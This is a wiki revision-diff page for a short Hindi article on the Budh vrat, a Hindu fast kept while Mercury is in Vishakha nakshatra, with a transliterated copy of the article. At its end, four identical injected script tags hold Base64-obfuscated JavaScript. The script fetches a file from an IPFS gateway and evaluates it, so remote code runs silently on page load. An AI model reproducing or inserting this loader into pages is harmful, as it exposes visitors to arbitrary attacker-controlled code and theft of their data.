Difference between revisions of "बुध व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*जब [[बुध ग्रह]] [[विशाखा नक्षत्र]] में आ जाता है, उस समय सात दिनों तक नक्त विधि से भोजन किया जाता है।  
 
*जब [[बुध ग्रह]] [[विशाखा नक्षत्र]] में आ जाता है, उस समय सात दिनों तक नक्त विधि से भोजन किया जाता है।  
 
*पीतल के पात्र में 'बुध ग्रह' की प्रतिमा रखी जाती है और यह श्वेत मालाओं एवं गंध आदि के साथ एक ब्राह्मण को दे दी जाती है।  
 
*पीतल के पात्र में 'बुध ग्रह' की प्रतिमा रखी जाती है और यह श्वेत मालाओं एवं गंध आदि के साथ एक ब्राह्मण को दे दी जाती है।  
*बुध बुद्धि को तीव्र करता है और वास्तविक ज्ञान देता है <ref>हेमाद्रि (व्रत0 2, 578, भविष्योत्तरपुराण से उद्धरण)</ref>
+
*बुध बुद्धि को तीव्र करता है और वास्तविक ज्ञान देता है।<ref>हेमाद्रि (व्रत0 2, 578, भविष्योत्तरपुराण से उद्धरण</ref>
 
   
 
   
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:41, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jab budh grah vishakha nakshatr mean a jata hai, us samay sat dinoan tak nakt vidhi se bhojan kiya jata hai.
  • pital ke patr mean 'budh grah' ki pratima rakhi jati hai aur yah shvet malaoan evan gandh adi ke sath ek brahman ko de di jati hai.
  • budh buddhi ko tivr karata hai aur vastavik jnan deta hai.[1]



tika tippani aur sandarbh

  1. hemadri (vrat0 2, 578, bhavishyottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>